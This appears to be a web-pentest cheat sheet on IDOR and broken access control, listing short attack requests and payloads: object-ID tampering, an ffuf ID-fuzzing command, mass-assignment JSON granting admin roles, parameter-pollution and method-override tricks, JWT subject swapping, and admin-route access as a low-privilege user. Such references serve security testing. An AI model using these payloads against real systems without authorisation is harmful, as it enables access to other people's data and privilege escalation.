web-pentest
IDOR & Broken Access Control
Insecure Direct Object Reference and broken access control — ID tampering, mass assignment, verb abuse, encoded references, BFLA function-level access and Autorize/Arjun tooling.
Finding IDOR (4)
GET /api/users/1001 -> /api/users/1002
Increment/decrement object IDs to reach others' data
GET /api/invoice?id=1002
Tamper an ID in the query string
/api/users/me vs /api/users/1002
Compare the self route with a direct-ID route
ffuf -w ids.txt -u https://target.com/api/users/FUZZ -H "Authorization: Bearer TOKEN" -mc 200
Fuzz IDs and flag 200 responses
Parameter & Body Tampering (4)
{"userId": 1002}
Swap the user id in a JSON body
{"role":"admin","isAdmin":true}
Mass assignment — add privileged fields the API trusts
id=self&id=1002
Duplicate parameter — some parsers honour the last (or first)
id[]=1002
Wrap the id in an array to bypass type checks
HTTP Verb / Method (2)
change GET to PUT / PATCH / DELETE on another user's resource
Write or modify via an unprotected verb
X-HTTP-Method-Override: PUT
Smuggle a privileged method past verb-based rules
Indirect / Encoded References (3)
?id=MTAwMg== (base64 of 1002)
Decode, change, then re-encode object references
JWT sub claim set to the victim's id
Change the subject when the API trusts the token id
?file=<md5(1002)>
Guess hashed identifiers derived from sequential values
BFLA — Function-Level (3)
GET /api/admin/users (as a low-privilege user)
Reach admin functions directly (Broken Function-Level Authz)
POST /api/users/1002/promote
Invoke privileged actions against other users
swap /user/ for /admin/ in known routes
Guess hidden privileged endpoints
Bypass Tricks & Tooling (3)
append .json / a trailing slash / change path case
Dodge naive route-based access rules
Burp Autorize / AuthMatrix extension
Auto-compare low-priv vs high-priv responses on every request
arjun -u https://target.com/api/endpoint
Discover hidden parameters that may be IDOR-able
Related Articles
5
Web Hacking
JSON and YAML Unsafe Deserialization
Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …
Web Hacking
Supply Chain Attacks
Deep technical guide to software supply chain attacks — dependency confusion, malicious np…
Web Hacking
Cross-Site Scripting Mastery
Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…
Web Hacking
File Upload to RCE
Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…
Web Hacking
Advanced SSRF
Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…
